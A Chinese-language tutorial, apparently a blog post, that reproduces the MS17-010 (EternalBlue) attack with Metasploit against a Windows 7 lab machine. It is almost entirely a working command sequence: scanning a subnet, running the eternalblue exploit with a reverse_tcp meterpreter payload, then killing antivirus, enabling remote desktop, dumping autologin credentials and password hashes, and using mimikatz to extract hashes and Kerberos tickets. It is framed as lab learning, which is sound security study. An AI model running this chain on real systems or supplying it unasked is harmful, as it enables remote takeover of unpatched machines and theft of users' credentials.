23.通過MS17_010來學習msf對滲透的利用
Metersploit 集成了滲透階段的全部利用,從漏洞探測,到漏洞利用,最後到後滲透階段。本次部落格主要拋磚引玉,通過對MS17_010漏洞的復現,來學習Metasploit。
漏洞環境:
靶機:windows 7 (192.168.0.135)
攻擊機:kali 2018 (192.168.0.133)
開始之前先來熟悉 Metaspolit 基本術語:
Auxiliaries(輔助模組),Exploit(漏洞利用模組),Payload(攻擊載荷模組),Post(後期滲透模組),Encoders(編碼工具模組)
1.載入smb掃描模組
msf > search auxiliary/scanner/smb
發現可利用的smb_ms17_010模組
2.載入漏洞掃描模組對ip段進行漏洞掃描:
msf > use auxiliary/scanner/smb/smb_ms17_010
msf > set rhosts 192.168.0.100-150
msf > set threads 10
msf > run
發現 192.168.0.135 這臺主機可能存在MS17_010漏洞
3.利用nmap對漏洞主機進行探測:
msf > nmap -T4 -A 192.168.0.135
發現敏感埠139,445開啟
4.搜尋MS17_010可利用漏洞模組
msf > search ms17_010
(沒有的話 git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git)
5.載入漏洞利用模組,設定引數
msf > use exploit/windows/smb/ms17_010_eternalblue
msf > set lhost 192.168.0.133
msf > set rhost 192.168.0.135
msf > set payload windows/x64/meterpreter/reverse_tcp
msf > exploit
可以看到漏洞利用成功,現在是 system 最高許可權
6.資訊檢視
檢視系統資訊:
meterpreter > sysinfo
檢視是否為虛擬機器:
meterpreter > run post/windows/gather/checkvm
檢視目標機執行時間:
meterpreter > idletime
檢視完整網路設定:
meterpreter > route
關閉防毒軟體:
meterpreter > run post/windows/manage/killav
啟動目標機的遠端桌面協議,開啟3389埠:
meterpreter > run post/windows/manage/enable_rdp
可以看到已經成功啟動了遠端桌面。
列舉當前登陸過的使用者:
meterpreter > run post/windows/gather/enum_logged_on_users
可以看到有 SecEvery,Administrator兩個使用者。
列舉安裝在目標機上的應用程式:
meterpreter > run post/windows/gather/enum_applications
將當前Meterpreter終端隱藏在後臺:
meterpreter > background
需要重新呼叫終端:
meterpreter > sessions -i 1
很多使用者習慣將計算機設定為自動登陸,下面這個命令可以抓取自動登陸的使用者名稱和密碼:
meterpreter > run windows/gather/credentials/windows_autologin
下載c盤下1.txt檔案到/home目錄下:
meterpreter > download c:\txt /home
上傳/home目錄下1.txt檔案到c盤下:
meterpreter > upload /home/1.txt c:\
密碼抓取:
1.使用Hashdump抓取密碼
Hashdump Meterpreter指令碼可以從目標機中提取Hash值,破解Hash值即可獲得登陸密碼。計算機中的每個賬號(如果是域伺服器,則為域內的每個賬號)的使用者名稱和密碼都儲存在sam檔案中,當計算機執行時,該檔案對所有賬號進行鎖定,要想訪問就必須有“系統級”賬號。所以要使用改名了就必須進行許可權提升。
在Meterpreter Shel提示符下輸入hashdump命令,將匯出目標機sam資料庫中的Hash:
2.使用Mimikatz抓取密碼
載入mimikatz模組:
meterpreter > load mimikatz
看了大概使用方法後,既可以使用Metasploit內建的命令,也可以使用Mimikatz自帶的命令從目標機器上匯出Hash和明文證書。
抓取系統Hash:
meterpreter > msv
md5解密:
抓取系統票據:
meterpreter > kerberos
獲取系統賬戶資訊:
參考連結: